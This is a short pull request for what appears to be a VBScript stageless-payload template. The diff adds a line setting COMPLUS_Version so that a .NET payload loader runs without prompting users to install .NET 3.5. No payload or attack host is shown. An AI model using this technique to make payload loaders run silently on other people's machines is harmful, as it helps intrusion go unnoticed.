### PR TITLE
Fix SetVersion function in stagelessv4.vbs

### DIFF
--- a/templates/stagelessv4.vbs
+++ b/templates/stagelessv4.vbs
@@ -4,6 +4,7 @@ End Sub
 Sub SetVersion
 Dim shell
 Set shell = CreateObject("WScript.Shell")
+shell.Environment("Process").Item("COMPLUS_Version") = "v4.0.30319"
 End Sub
 
 Function Base64ToStream(b)


### PR DESCRIPTION
SetVersion function in stagelessv4.vbs template was missing the line to actually set the COMPLUS_Version variable, causing the .NET 3.5 installation prompt on a fresh Windows 10 installation when using a stageless payload.